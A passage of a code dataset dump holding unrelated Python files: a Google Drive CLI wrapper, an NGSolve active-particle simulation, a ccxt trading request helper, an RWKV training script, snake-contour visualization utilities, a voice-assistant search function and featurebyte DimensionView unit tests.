json.loads(open('gdriveauth').read())\naccess_token = access_token['access_token']\n\n\ndef list_file(folder_id='root', max_files=100000, output_file=None):\n\tcommand = \"./google-drive --access-token %s list -q '\\\"%s\\\" in parents and trashed=False' -m %d\" % (access_token, folder_id, max_files)\n\t\n\tif output_file:\n\t\tstdout = os.popen(command).read()\n\t\toutput_file = open(output_file, 'w')\n\n\t\toutput_file.write(stdout)\n\t\toutput_file.close()\n\telse:\n\t\tos.system(command)\n\n\n@cli.command()\n@click.option('--id', help='ID of the parent directory')\n@click.option('--url', help='URL of the parent directory')\n@click.option('-m', '--mx' , type=int, default=100000, help='Max number of files')\n@click.option('-o', '--output-file', help='Output the list in a file')\ndef list(id, url, mx, output_file):\n\tif id and not url:\n\t\tlist_file(id, mx, output_file)\n\telif not id and url:\n\t\tif url.find('id=') != -1:\n\t\t\tindex = url.find('id=')+3\n\t\t\tid = url[index:]\n\t\telse:\n\t\t\tif url.find('?usp=sharing') != -1:\n\t\t\t\turl = url[:-12]\n\t\t\tid = url.split('/')\n\t\t\tid = id[-1]\n\t\tlist_file(id, mx, output_file)\n\telif not id and not url:\n\t\tlist_file()\n\n\n@cli.command()\n@click.option('--id', help='ID of the file to download')\n@click.option('-f', '--file', help='Specify file to read info regarding download')\n@click.option('-o', '--output-file', default='output/', help='Path to the directory where to save the file, default = ./output/*')\ndef download(id, file, output_file):\n\tto_download = []\n\n\tif file:\n\t\twith open(file) as inp_file:\n\t\t\tfile_infos = inp_file.readlines()\n\n\t\t\tfor line in file_infos:\n\t\t\t\twords = line.split()\n\n\t\t\t\tif words[0] != 'Id':\n\t\t\t\t\tto_download.append(words[0])\n\tif id:\n\t\tto_download.append(id)\n\n\tfor id in to_download:\n\t\tos.system('./google-drive --access-token %s download --path %s -f -r %s' % (access_token, output_file, id))\n\n\nif __name__ == \"__main__\":\n\tcli()","repo_name":"raihatneloy/GDrive-Script","sub_path":"gdrive.py","file_name":"gdrive.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2711742695","text":"from ngsolve import *\nfrom netgen.geom2d import SplineGeometry, unit_square\nfrom ngsapps.utils import *\nimport settings\nimport pickle\n\n# FIXME: AnnulusSpeedCF Dx, Dy do not respect smear\n\norder = 3\nmaxh = 7\n\nvtkoutput = False\n\n# time step and end\n# tau = 0.01\n# tau = 0.5\ntau = 5\ntend = -1\n\n# diffusion coefficient for rho\nDT = 0.004\n\n# determines how quickly the average local swim speed\n# decreases with the density\nalpha = 0.38\n\n# positive parameters which ensure that, at steady state\n# and in the absence of any density or velocity gradients,\n# W vanishes everywhere\ngamma1 = 0.1\ngamma2 = 0.5\n\n# effective diffusion coefficent for W\n# ensures continuity of this field\n# k = 0.1\nk = 2\n\n# self-advection\nw1 = 0\n# active pressure, >0\nw2 = 30\n\nmesh, v, vdx, vdy = settings.annulusInPeriodicSquare(order, maxh)\n# mesh, v, vdx, vdy = settings.annulus(order, maxh)\n# mesh, v, vdx, vdy = settings.singleSawtooth(order, 2)\n\ngradv = CoefficientFunction((vdx, vdy))\n\nfesRho = Periodic(H1(mesh, order=order))\nfesW = Periodic(H1(mesh, order=order-1))\nfes = FESpace([fesRho, fesW, fesW])\n\nrho, Wx, Wy = fes.TrialFunction()\ntrho, tWx, tWy = fes.TestFunction()\n\nW = CoefficientFunction((Wx, Wy))\nWxdx = grad(Wx)[0]\nWxdy = grad(Wx)[1]\nWydx = grad(Wy)[0]\nWydy = grad(Wy)[1]\ndivW = Wxdx + Wydy\ngradWx = CoefficientFunction((Wxdx, Wxdy))\ngradWy = CoefficientFunction((Wydx, Wydy))\n\ntW = CoefficientFunction((tWx, tWy))\ntWxdx = grad(tWx)[0]\ntWxdy = grad(tWx)[1]\ntWydx = grad(tWy)[0]\ntWydy = grad(tWy)[1]\ndivtW = tWxdx + tWydy\ngradtWx = CoefficientFunction((tWxdx, tWxdy))\ngradtWy = CoefficientFunction((tWydx, tWydy))\n\ng = GridFunction(fes)\ngrho, gWx, gWy = g.components\ngW = CoefficientFunction((gWx, gWy))\nvbar = v * exp(-alpha*grho)\ngradvbar = gradv*exp(-alpha*grho) - alpha*grad(grho)*vbar\nWdotdelW = CoefficientFunction((gW*gradWx, gW*gradWy))\ngradnormWsq = 2*gWx*gradWx + 2*gWy*gradWy\n\n# initial values\n# grho.Set(exp(-sqr(x)-sqr(y)))\n# measure = Integrate(CoefficientFunction(1), mesh)\n# grho.Set(CoefficientFunction(1/measure))\ngrho.Set(CoefficientFunction(1))\n# grho.Set(CoefficientFunction(0.01))\ngWx.Set(CoefficientFunction(0))\ngWy.Set(CoefficientFunction(0))\n\na = BilinearForm(fes)\n\n# equation for rho\n# TODO: boundary terms from partial integration?\n# TODO: separate terms which need to be reassembled at every time step\na += SymbolicBFI(vbar*W*grad(trho) - DT*grad(rho)*grad(trho))\n# a += SymbolicBFI((vbar*W*grad(trho) - DT*grad(rho)*grad(trho)).Compile(True))\n# a += SymbolicBFI(-gradvbar*W*trho - vbar*divW*trho - DT*grad(rho)*grad(trho))\n\n# # equation for W\na += SymbolicBFI(0.5*vbar*rho*divtW - gamma1*W*tW\n -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*divW*divtW\n -w1*WdotdelW*tW + w2*gradnormWsq*tW)\n# a += SymbolicBFI((0.5*vbar*rho*divtW - gamma1*W*tW\n# -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*divW*divtW\n# -w1*WdotdelW*tW + w2*gradnormWsq*tW).Compile(True))\n# a += SymbolicBFI(-0.5*(gradvbar*rho + vbar*grad(rho))*tW - gamma1*W*tW\n# -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*gradWx*gradtWx - k*gradWy*gradtWy\n# -w1*WdotdelW*tW + w2*gradnormWsq*tW)\n\nm = BilinearForm(fes)\nm += SymbolicBFI(rho*trho + W*tW)\n\nm.Assemble()\n\nrhs = g.vec.CreateVector()\nmstar = m.mat.CreateMatrix()\n\n# pickin = pickle.Unpickler(open('sawtooth2d_8.dat', 'rb'))\n# pickout = pickle.Pickler(open('sawtooth2d_9.dat', 'wb'))\n# while True:\n# try:\n# g.vec.FV().NumPy()[:] = pickin.load().tolist()\n# except EOFError:\n# break\n\n# # # g.vec.data = gp.vec\n# # # print(g.components[0].vec)\n# for i in range(len(g.vec)):\n# g.vec[i] = gp[i]\n# # print(g.vec[i])\n# # # print(g.vec)\n\nDraw(vdy, mesh, 'vdy')\nDraw(vdx, mesh, 'vdx')\nDraw(v, mesh, 'v')\nDraw(gW, mesh, 'W')\nDraw(vbar*gW-DT*grad(grho), mesh,'J')\nDraw(grho, mesh, 'rho')\n\nif vtkoutput:\n vtk = MyVTKOutput(ma=mesh, coefs=[g.components[0], g.components[1], g.components[2]],names=[\"rho\", \"Wx\", \"Wy\"], filename=\"instab/instab\",subdivision=3)\n vtk.Do()\n\ninput(\"Press any key...\")\nt = 0.0\nwith TaskManager():\n while tend < 0 or t < tend - tau / 2:\n print(\"\\nt = {:10.6e}\".format(t))\n t += tau\n print('Assembling a...')\n a.Assemble()\n print('...done')\n\n rhs.data = m.mat * g.vec\n mstar.AsVector().data = m.mat.AsVector() - tau*a.mat.AsVector()\n invmat = mstar.Inverse(fes.FreeDofs())\n g.vec.data = invmat * rhs\n\n # pickout.dump(g.vec.FV().NumPy())\n\n Redraw(blocking=False)\n # if t > 12:\n # input()\n if vtkoutput:\n vtk.Do()\n","repo_name":"jfpxtal/ngsapps","sub_path":"activeparticles/continuum.py","file_name":"continuum.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19357605262","text":"import time\nimport ccxt\nfrom DataFetch import DataFetch\nfrom Logger import myLogger\nfrom Exchange import Exchange\n\nclass SendRequest: \n def __init__(self, symbol, exchange, amount, logFile, setSandbox = False) -> None:\n self.symbol = symbol\n self.amount = amount\n self.logFile = logFile\n self.exchange = Exchange(exchange, setSandbox)\n self.fetcher = DataFetch(exchange, setSandbox)\n\n \n async def req(self, task, input1=None, input2=None):\n tries = 3\n\n for i in range(tries):\n try:\n if task == \"get_bid_ask_price\":\n ticker = await self.fetcher.fetchTickers(self.symbol)\n return ticker[\"bid\"], ticker[\"ask\"]\n\n elif task == \"get_order\":\n return (await self.fetcher.fetchOrder(input1, input2))[\"info\"]\n \n elif task == \"cancel_order\":\n data = (await self.exchange.cancelOrder(input1, input2))\n if (type(data) is str):\n return \"OrderNotFound\"\n else:\n return data[\"info\"]\n\n elif task == \"place_order\":\n #sendRequest(self,task,input1=side,input2=price)\n side = input1\n price = input2\n orderid=0\n if side ==\"buy\":\n orderid = (await self.exchange.buy(self.symbol, \"limit\", self.amount, price))[\"info\"][\"orderId\"]\n else:\n orderid = (await self.exchange.sell(self.symbol, \"limit\", self.amount, price))[\"info\"][\"orderId\"]\n return orderid\n \n elif task == \"get_balance\":\n return (await self.exchange.getAccountBalance())[\"free\"][input1]\n \n elif task == \"fetch_order_book\":\n return (await self.fetcher.fetchOrderBook(limit=input1, symbol=self.symbol))[input2]\n \n elif task == \"exit_market\":\n coinAccountBalance = (await self.exchange.getAccountBalance())[\"free\"][self.symbol.split(\"/\")[0]]\n ask_price = (await self.fetcher.fetchTickers(self.symbol))[\"ask\"]\n\n if coinAccountBalance <= 0:\n return -1; \n\n orderid = (await self.exchange.sell(self.symbol, \"limit\", coinAccountBalance, ask_price))[\"info\"][\"orderId\"]\n \n return orderid\n elif task == \"enter_market\":\n ask_price = (await self.fetcher.fetchTickers(self.symbol))[\"ask\"]\n orderid = (await self.exchange.buy(self.symbol, \"limit\", self.amount * input1, ask_price))[\"info\"][\"orderId\"]\n \n return orderid\n\n\n else:\n return None\n except ccxt.NetworkError as e:\n if i < tries - 1: # i is zero indexed\n \n myLogger(\"NetworkError , try last \"+str(i) +\"chances\" + str(e), self.logFile)\n time.sleep(0.5)\n continue\n else:\n myLogger(str(e), self.logFile)\n raise\n except ccxt.ExchangeError as e:\n if i < tries - 1: # i is zero indexed\n myLogger(str(e), self.logFile)\n time.sleep(0.5)\n continue\n else:\n myLogger(str(e), self.logFile)\n raise","repo_name":"elyskrie21/W3CC-TradingBot","sub_path":"tradebot-mv/tradebot_mv/SendRequest.py","file_name":"SendRequest.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36986197463","text":"from RWKV import RWKVLMHeadModel\n\nimport numpy as np\nimport torch\n\nfrom tqdm import tqdm\nfrom transformers import GPT2TokenizerFast\nfrom datasets import load_dataset\nimport deepspeed\n\ntokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\", pad_token='<|pad|>', eos_token='<|endoftext|>')\n\n### hyperparameters\n\nvocab_size = tokenizer.vocab_size + 2\nn_layers = 12\nhidden_size = 1024\nlearning_rate = 5e-5\nbatch_size = 32\nmax_len = 256\nnum_epochs = 5\n\nmodel = RWKVLMHeadModel(vocab_size, hidden_size, n_layers).cuda()\n\nprint(\"model parameters: {:_}\".format(sum(p.numel() for p in model.parameters())))\nprint(\"model init done\")\n\nloss_fn = torch.nn.CrossEntropyLoss(ignore_index=tokenizer.pad_token_id)\noptimizer = torch.optim.AdamW(model.parameters(), lr=learning_rate)\n\n# initialize deepspeed\n\ndeepspeed.init_distributed(dist_backend='nccl')\n\n# load the dataset\n\nwikitext = load_dataset('wikitext', 'wikitext-103-v1')['train']['text']\ntrain_dataset = []\nfor sentence in wikitext:\n if len(sentence) > 15:\n train_dataset.append(\"{} {} {}\".format(tokenizer.eos_token, sentence, tokenizer.eos_token))\n\nmodel_engine, optimizer, train_dataloader, _ = deepspeed.initialize(model=model, optimizer=optimizer,\n model_parameters=model.parameters(), config='ds_config.json',\n training_data=train_dataset)\n\n# training loop\n\nfor epoch in range(num_epochs):\n model_engine.train()\n\n # save checkpoint\n torch.save(model.state_dict(), 'checkpoint.pt')\n print('saving checkpoint complete.')\n step = 0\n\n pbar = tqdm(train_dataloader)\n pbar.set_description(\"epoch: {}, loss: {:.4f}\".format(epoch, 0.0))\n for batch in pbar:\n model_engine.zero_grad()\n model_engine.train()\n \n batch = tokenizer(batch, padding='max_length', max_length=max_len,\n truncation=True, return_tensors='pt').input_ids.cuda()\n\n input_ids, labels = batch[:, :-1].contiguous(), batch[:, 1:].contiguous()\n outputs = model_engine(input_ids)\n\n loss = loss_fn(outputs.view(-1, vocab_size), labels.view(-1))\n \n model_engine.backward(loss)\n model_engine.step()\n\n pbar.set_description(\"epoch: {}, loss: {:.4f}\".format(epoch, loss.item()))\n\n step += 1\n if step % 10 == 0:\n model_engine.eval()\n sentence = \"{}\".format(tokenizer.eos_token)\n token = tokenizer(sentence, return_tensors='pt')['input_ids'].cuda()\n print(\n tokenizer.decode(\n model.generate(token, max_len=64)[0].cpu().numpy(),\n skip_special_tokens=True\n )\n )\n\n if step % 100 == 0:\n torch.save(model.state_dict(), 'checkpoint.pt')\n print('saving checkpoint complete.')\n\n### save model\n\ntorch.save(model.state_dict(), 'model.pt')\nprint('saving model complete.')","repo_name":"seung7361/RWKV-Pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"31044253641","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom lib.utils.img_utils import colors\nfrom lib.utils import img_utils\nfrom lib.utils.snake import snake_cityscapes_utils, snake_config\n\n\nR = 8\nGREEN = (18, 127, 15)\nWHITE = (255, 255, 255)\n\n\ndef visualize_snake_detection(img, data):\n\n def blend_hm_img(hm, img):\n hm = np.max(hm, axis=0)\n h, w = hm.shape[:2]\n img = cv2.resize(img, dsize=(w, h), interpolation=cv2.INTER_LINEAR)\n hm = np.array([255, 255, 255]) - (hm.reshape(h, w, 1) * colors[0]).astype(np.uint8)\n ratio = 0.5\n blend = (img * ratio + hm * (1 - ratio)).astype(np.uint8)\n return blend\n\n img = img_utils.bgr_to_rgb(img)\n blend = blend_hm_img(data['ct_hm'], img)\n\n plt.imshow(blend)\n ct_ind = np.array(data['ct_ind'])\n w = img.shape[1] // snake_config.down_ratio\n xs = ct_ind % w\n ys = ct_ind // w\n for i in range(len(data['wh'])):\n w, h = data['wh'][i]\n x_min, y_min = xs[i] - w / 2, ys[i] - h / 2\n x_max, y_max = xs[i] + w / 2, ys[i] + h / 2\n plt.plot([x_min, x_min, x_max, x_max, x_min], [y_min, y_max, y_max, y_min, y_min])\n plt.show()\n\n\ndef visualize_cp_detection(img, data):\n act_ind = data['act_ind']\n awh = data['awh']\n\n act_hm_w = data['act_hm'].shape[2]\n cp_h, cp_w = data['cp_hm'][0].shape[1], data['cp_hm'][0].shape[2]\n\n img = img_utils.bgr_to_rgb(img)\n plt.imshow(img)\n\n for i in range(len(act_ind)):\n act_ind_ = act_ind[i]\n ct = act_ind_ % act_hm_w, act_ind_ // act_hm_w\n w, h = awh[i]\n abox = np.array([ct[0] - w/2, ct[1] - h/2, ct[0] + w/2, ct[1] + h/2])\n\n cp_ind_ = data['cp_ind'][i]\n cp_wh_ = data['cp_wh'][i]\n\n for j in range(len(cp_ind_)):\n ct = cp_ind_[j] % cp_w, cp_ind_[j] // cp_w\n x = ct[0] / cp_w * w\n y = ct[1] / cp_h * h\n x_min = (x - cp_wh_[j][0] / 2 + abox[0]) * snake_config.down_ratio\n y_min = (y - cp_wh_[j][1] / 2 + abox[1]) * snake_config.down_ratio\n x_max = (x + cp_wh_[j][0] / 2 + abox[0]) * snake_config.down_ratio\n y_max = (y + cp_wh_[j][1] / 2 + abox[1]) * snake_config.down_ratio\n plt.plot([x_min, x_min, x_max, x_max, x_min], [y_min, y_max, y_max, y_min, y_min])\n\n plt.show()\n\n\ndef visualize_snake_evolution(img, data):\n img = img_utils.bgr_to_rgb(img)\n plt.imshow(img)\n for poly in data['i_gt_py']:\n poly = poly * 4\n poly = np.append(poly, [poly[0]], axis=0)\n plt.plot(poly[:, 0], poly[:, 1])\n plt.scatter(poly[0, 0], poly[0, 1], edgecolors='w')\n plt.show()\n\n\ndef visualize_snake_octagon(img, extreme_points):\n img = img_utils.bgr_to_rgb(img)\n octagons = []\n bboxes = []\n ex_points = []\n for i in range(len(extreme_points)):\n for j in range(len(extreme_points[i])):\n bbox = get_bbox(extreme_points[i][j]*4)\n octagon = snake_cityscapes_utils.get_octagon(extreme_points[i][j]*4)\n bboxes.append(bbox)\n octagons.append(octagon)\n ex_points.append(extreme_points[i][j])\n _, ax = plt.subplots(1)\n ax.imshow(img)\n n = len(octagons)\n for i in range(n):\n x, y, x_max, y_max = bboxes[i]\n ax.add_patch(patches.Polygon(xy=[[x, y], [x, y_max], [x_max, y_max], [x_max, y]], fill=False, linewidth=1,\n edgecolor='r'))\n octagon = np.append(octagons[i], octagons[i][0]).reshape(-1, 2)\n ax.plot(octagon[:, 0], octagon[:, 1])\n ax.scatter(ex_points[i][:, 0] * 4, ex_points[i][:, 1] * 4, edgecolors='w')\n plt.show()\n\n\ndef get_bbox(ex):\n x = ex[:, 0]\n y = ex[:, 1]\n bbox = [np.min(x), np.min(y), np.max(x), np.max(y)]\n return bbox\n","repo_name":"zju3dv/snake","sub_path":"lib/utils/snake/visualize_utils.py","file_name":"visualize_utils.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":1126,"dataset":"github-code","pt":"78"} +{"seq_id":"16554305155","text":"#searching item in net---------------------------------\ndef browser(self):\n speak_text_cmd('What You want to search for...')\n class browser:\n website=\"\"\n \n search=browser()\n search.website=speech.recognize_google(audio)\n find=search.website\n \n if len(find.split()) <= 1: \n if(find.endswith(\".com\")):\n wb.open('{}'.format(find), new=3)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".net\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".in\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".org\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n else:\n com=find+\".com\"\n wb.open('{}'.format(com), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n else:\n find=(\"https://www.google.com/search?q={}\".format(find))\n wb.open('{}'.format(find),new=2)\n print(\"finding using else\")\n speak_text_cmd(\"Open the File..\")\n \n \n speak_text_cmd()\n","repo_name":"GowthamBA/Voice-Assistant","sub_path":"VoiceAss v1.py","file_name":"VoiceAss v1.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12031349851","text":"\"\"\"\nUnit tests for DimensionView class\n\"\"\"\nimport textwrap\n\nimport pytest\n\nfrom featurebyte.api.dimension_view import DimensionView\nfrom featurebyte.api.feature_list import FeatureList\nfrom featurebyte.enum import DBVarType\nfrom featurebyte.exception import JoinViewMismatchError, RepeatedColumnNamesError\nfrom featurebyte.query_graph.enum import NodeOutputType, NodeType\nfrom tests.unit.api.base_view_test import BaseViewTestSuite, ViewType\nfrom tests.util.helper import check_sdk_code_generation, get_node\n\n\nclass TestDimensionView(BaseViewTestSuite):\n \"\"\"\n DimensionView test suite\n \"\"\"\n\n protected_columns = [\"col_int\"]\n view_type = ViewType.DIMENSION_VIEW\n col = \"cust_id\"\n view_class = DimensionView\n bool_col = \"col_boolean\"\n expected_view_with_raw_accessor_sql = \"\"\"\n SELECT\n \"col_int\" AS \"col_int\",\n \"col_float\" AS \"col_float\",\n \"col_char\" AS \"col_char\",\n \"col_text\" AS \"col_text\",\n \"col_binary\" AS \"col_binary\",\n \"col_boolean\" AS \"col_boolean\",\n CAST(\"event_timestamp\" AS STRING) AS \"event_timestamp\",\n \"cust_id\" AS \"cust_id\",\n (\n \"cust_id\" + 1\n ) AS \"new_col\"\n FROM \"sf_database\".\"sf_schema\".\"dimension_table\"\n LIMIT 10\n \"\"\"\n\n def getitem_frame_params_assertions(self, row_subset, view_under_test):\n assert row_subset.dimension_id_column == view_under_test.dimension_id_column\n\n\ndef test_validate_join(snowflake_dimension_view, snowflake_scd_view):\n with pytest.raises(JoinViewMismatchError):\n snowflake_dimension_view.validate_join(snowflake_scd_view)\n\n # assert that joining with a dimension view has no issues\n snowflake_dimension_view.validate_join(snowflake_dimension_view)\n\n\ndef test_get_join_column(snowflake_dimension_view):\n column = snowflake_dimension_view.get_join_column()\n # col_int is the dimension_id column name used when creating this view fixture\n assert column == \"col_int\"\n\n\ndef test_join_same_rsuffix_multiple_times(snowflake_dimension_view, snowflake_dimension_table):\n \"\"\"\n Test scenario where rsuffix didn't help to resolve repeated columns issue\n \"\"\"\n original_columns = snowflake_dimension_view.columns[:]\n other_view = snowflake_dimension_view[[\"col_text\"]]\n\n node_name_before = snowflake_dimension_view.node_name\n joined_view = snowflake_dimension_view.join(other_view, rsuffix=\"_y\")\n assert snowflake_dimension_view.node_name == node_name_before\n assert joined_view.columns == original_columns + [\"col_text_y\"]\n\n with pytest.raises(RepeatedColumnNamesError) as exc:\n joined_view.join(other_view, rsuffix=\"_y\")\n assert \"Duplicate column names ['col_text_y'] found\" in str(exc.value)\n\n joined_again_view = joined_view.join(other_view, rsuffix=\"_z\")\n assert joined_again_view.columns == original_columns + [\"col_text_y\", \"col_text_z\"]\n\n # check SDK code generation\n check_sdk_code_generation(\n snowflake_dimension_view,\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n }\n },\n )\n\n\n@pytest.fixture\ndef snowflake_dimension_view_with_entity(\n snowflake_dimension_table, cust_id_entity, mock_api_object_cache\n):\n \"\"\"\n Fixture of a DimensionView with entity tagged\n \"\"\"\n _ = mock_api_object_cache\n snowflake_dimension_table[\"col_int\"].as_entity(cust_id_entity.name)\n view = snowflake_dimension_table.get_view()\n return view\n\n\ndef test_as_features__invalid_column_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with a missing input column name\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([\"non_existing_col\"], [\"feature_name\"])\n assert str(exc.value) == \"Column 'non_existing_col' not found\"\n\n\ndef test_as_features__empty_column_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with invalid number of feature names provided\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([], [])\n assert str(exc.value) == \"column_names is empty\"\n\n\ndef test_as_features__duplicate_feature_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with duplicate values in feature_names\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features(\n column_names=[\"col_float\", \"col_text\"],\n feature_names=[\"FloatFeature\", \"FloatFeature\"],\n )\n assert str(exc.value) == \"feature_names contains duplicated value(s)\"\n\n\ndef test_as_features__primary_key_not_entity(snowflake_dimension_view, mock_api_object_cache):\n \"\"\"\n Test as_features() when the primary key in not an entity\n \"\"\"\n _ = mock_api_object_cache\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([\"col_float\", \"col_char\"], [\"col_float\", \"col_char\"])\n assert str(exc.value) == 'Column \"col_int\" is not an entity!'\n\n\ndef test_as_features__with_primary_key_column(\n snowflake_dimension_view_with_entity, snowflake_dimension_table, cust_id_entity\n):\n \"\"\"\n Test calling as_features() when including primary column works correctly\n \"\"\"\n # Set entity\n view = snowflake_dimension_view_with_entity\n entity_column = \"col_int\"\n assert entity_column in view.entity_columns\n\n # Select columns for as_features\n columns = [entity_column, \"col_float\", \"col_char\"]\n feature_names = [\"IntFeature\", \"FloatFeature\", \"CharFeature\"]\n\n feature_group = view.as_features(columns, feature_names)\n assert feature_group.feature_names == [\"IntFeature\", \"FloatFeature\", \"CharFeature\"]\n assert feature_group[\"IntFeature\"].dtype == DBVarType.INT\n assert feature_group[\"FloatFeature\"].dtype == DBVarType.FLOAT\n assert feature_group[\"CharFeature\"].dtype == DBVarType.CHAR\n\n float_feature_dict = feature_group[\"CharFeature\"].dict()\n graph_dict = float_feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, float_feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_1\"},\n {\"source\": \"lookup_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"CharFeature\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_1\",\n \"type\": \"lookup\",\n \"output_type\": \"frame\",\n \"parameters\": {\n \"input_column_names\": [\"col_int\", \"col_float\", \"col_char\"],\n \"feature_names\": [\"IntFeature\", \"FloatFeature\", \"CharFeature\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n },\n }\n\n # check SDK code generation\n dimension_table_columns_info = snowflake_dimension_table.dict(by_alias=True)[\"columns_info\"]\n for feature_name in feature_names:\n check_sdk_code_generation(\n feature_group[feature_name],\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n # since the table is not saved, we need to pass in the columns info\n # otherwise, entity id will be missing and code generation will fail in as_features method\n \"columns_info\": dimension_table_columns_info,\n }\n },\n )\n\n\ndef test_as_features__offset_provided_but_ignored(\n snowflake_dimension_view_with_entity, snowflake_dimension_table, cust_id_entity\n):\n \"\"\"\n Test as_features() when offset is provided but ignored\n \"\"\"\n # offset ignored but should not have error\n view = snowflake_dimension_view_with_entity\n feature_group = view.as_features(\n [\"col_float\", \"col_char\"], [\"col_float\", \"col_char\"], offset=\"7d\"\n )\n\n # check SDK code generation\n dimension_table_columns_info = snowflake_dimension_table.dict(by_alias=True)[\"columns_info\"]\n check_sdk_code_generation(\n feature_group[\"col_float\"],\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n # since the table is not saved, we need to pass in the columns info\n # otherwise, entity id will be missing and code generation will fail in as_features method\n \"columns_info\": dimension_table_columns_info,\n }\n },\n )\n\n\ndef test_as_feature__not_supported(snowflake_dimension_view_with_entity):\n \"\"\"\n Test calling as_feature() is not supported on a temporary column\n \"\"\"\n view = snowflake_dimension_view_with_entity\n with pytest.raises(ValueError) as exc:\n (view[\"col_float\"] + 123).as_feature(\"col_float_plus_123\")\n assert \"as_feature is only supported for named columns in the View object\" in str(exc.value)\n\n\ndef test_as_feature__special_column(snowflake_dimension_view_with_entity):\n \"\"\"\n Test as_feature() by specifying a special column\n \"\"\"\n # col_int is not allowed in as_features(), but ok in as_feature()\n feature = snowflake_dimension_view_with_entity[\"col_int\"].as_feature(\"IntFeature\")\n assert feature.name == \"IntFeature\"\n\n\ndef test_as_feature_same_column_name(\n snowflake_dimension_view_with_entity, snowflake_scd_table, cust_id_entity\n):\n \"\"\"\n Test lookup features with same column name\n \"\"\"\n feature_a = snowflake_dimension_view_with_entity[\"col_float\"].as_feature(\n \"FloatFeatureDimensionView\"\n )\n\n snowflake_scd_table[\"col_text\"].as_entity(cust_id_entity.name)\n scd_view = snowflake_scd_table.get_view()\n feature_b = scd_view[\"col_float\"].as_feature(\"FloatFeatureSCDView\", offset=\"7d\")\n\n new_feature = feature_b == feature_a\n new_feature.name = \"lookup_combined_feature\"\n\n\ndef test_as_target__from_view_column(snowflake_dimension_view_with_entity, cust_id_entity):\n \"\"\"\n Test calling as_target() correctly\n \"\"\"\n view = snowflake_dimension_view_with_entity\n feature = view[\"col_float\"].as_target(\"FloatTarget\", \"1d\")\n assert feature.name == \"FloatTarget\"\n assert feature.dtype == DBVarType.FLOAT\n\n feature_dict = feature.dict()\n graph_dict = feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_target_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_target_1\"},\n {\"source\": \"lookup_target_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"FloatTarget\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_target_1\",\n \"type\": NodeType.LOOKUP_TARGET,\n \"output_type\": NodeOutputType.FRAME,\n \"parameters\": {\n \"input_column_names\": [\"col_float\"],\n \"feature_names\": [\"FloatTarget\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n \"offset\": \"1d\",\n },\n }\n\n\ndef test_as_feature__from_view_column(snowflake_dimension_view_with_entity, cust_id_entity):\n \"\"\"\n Test calling as_feature() correctly\n \"\"\"\n view = 